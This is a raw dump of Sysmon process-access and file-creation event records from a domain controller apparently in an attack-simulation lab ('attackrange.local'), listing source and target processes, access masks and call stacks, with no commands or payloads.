15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.898{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.898{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.866{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.866{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000023049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.804{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_orsidddn.2ee.ps12021-01-20 15:59:15.804 10341000x800000000000000023048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.804{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.741{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5353-6008-3206-00000000A301}1108C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.741{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5353-6008-3206-00000000A301}1108C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.741{7901BC46-5353-6008-3206-00000000A301}11081424C:\Windows\system32\conhost.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.741{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5353-6008-3206-00000000A301}1108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.726{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.726{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 